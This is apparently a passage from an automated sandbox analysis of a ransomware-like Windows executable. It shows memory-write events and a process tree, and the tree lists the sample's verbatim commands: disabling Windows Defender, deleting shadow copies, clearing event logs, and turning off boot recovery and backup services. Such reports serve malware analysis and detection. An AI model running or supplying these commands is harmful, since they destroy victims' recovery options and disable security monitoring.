9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 111 PID 4092 wrote to memory of 2996 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 113 PID 4092 wrote to memory of 2996 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 113 PID 4092 wrote to memory of 1564 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 115 PID 4092 wrote to memory of 1564 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 115 PID 4092 wrote to memory of 1276 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 117 PID 4092 wrote to memory of 1276 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 117 PID 4092 wrote to memory of 1056 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 119 PID 4092 wrote to memory of 1056 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 119 PID 4092 wrote to memory of 2172 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 121 PID 4092 wrote to memory of 2172 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 121 PID 4092 wrote to memory of 3228 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 123 PID 4092 wrote to memory of 3228 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe"C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1176
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:636
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:3672
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3976
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1776
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:856
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2672
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:4012
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12cc1" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12cc1" /y3⤵PID:2416
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:3992
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1140
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1480
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1520
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1840
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:3984
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2308
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:3960
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12cc1" start= disabled2⤵PID:2996
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1564
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1276
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1056
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2172
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3228
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3196
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2736
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3704
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:400
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1188
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:808
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3312
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3672
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3560
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1776
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:596
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:708
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1292
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:4012
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2424
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2132
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1460
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1624
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1476
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:4068
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2980
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3780
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3204
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1436
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3216
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3000
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2468
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2176
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1428
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:496
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3036
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2416
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1204
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1828
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4064
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3516
-
-